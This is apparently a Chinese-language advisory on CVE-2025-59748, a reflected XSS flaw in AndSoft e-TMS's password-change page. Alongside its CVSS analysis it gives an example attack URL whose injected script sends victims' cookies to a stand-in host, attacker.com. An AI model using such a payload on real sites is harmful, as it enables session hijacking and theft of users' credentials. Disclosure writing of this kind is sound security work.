CVE-2025-59748CVE-2025-59748是AndSoft公司开发的e-TMS(运输管理系统)v25.03版本中存在的一个反射型跨站脚本(Reflected Cross-Site Scripting, XSS)漏洞。该漏洞由西班牙国家网络安全研究所(INCIBE)于2025年10月2日披露,CVSS 3.1评分为6.1分,属于中等严重等级。
AndSoft e-TMS是一款广泛应用于物流和运输行业的企业级管理软件,用于管理运输订单、车辆调度、货物跟踪等业务。该漏洞存在于系统的密码修改页面(/clt/changepassword.asp)中,具体涉及'l'和'reset'两个URL参数。由于应用程序未对用户输入进行充分的过滤和转义处理,攻击者可以通过构造包含恶意JavaScript代码的URL,诱导受害者点击,从而在受害者的浏览器上下文中执行任意JavaScript代码。
该漏洞的攻击向量为网络(AV:N),无需认证(PR:N),但需要用户交互(UI:R),作用域发生变化(S:C)。成功利用此漏洞可能导致会话劫持、敏感信息窃取、钓鱼攻击或恶意操作等后果,对企业和个人的数据安全构成威胁。
该漏洞的根源在于e-TMS v25.03的密码修改功能模块(/clt/changepassword.asp)对URL参数'l'和'reset'的输入验证不足。具体而言,当用户访问密码修改页面时,应用程序会从URL中读取'l'和'reset'参数的值,并将其直接嵌入到返回的HTML页面中,而没有进行适当的HTML实体编码或输出转义。
攻击者利用此漏洞的方式如下:
1. 攻击者构造一个包含恶意JavaScript代码的特殊URL,例如:
`https://target.com/clt/changepassword.asp?l=<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>&reset=<script>alert('XSS')</script>`
2. 攻击者通过社会工程学手段(如钓鱼邮件、即时消息等)诱导受害者点击该恶意链接。
3. 受害者的浏览器向目标服务器发送请求,服务器将恶意脚本原样返回并嵌入到响应页面中。
4. 浏览器解析HTML时执行嵌入的恶意JavaScript代码。
5. 由于脚本在目标站点的上下文中执行,它能够访问该站点的Cookie、会话令牌等敏感信息。
该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N,表明其通过网络即可利用,攻击复杂度低,无需权限,但需要受害者进行交互(如点击链接),且漏洞利用会导致作用域变化,对机密性和完整性产生低影响。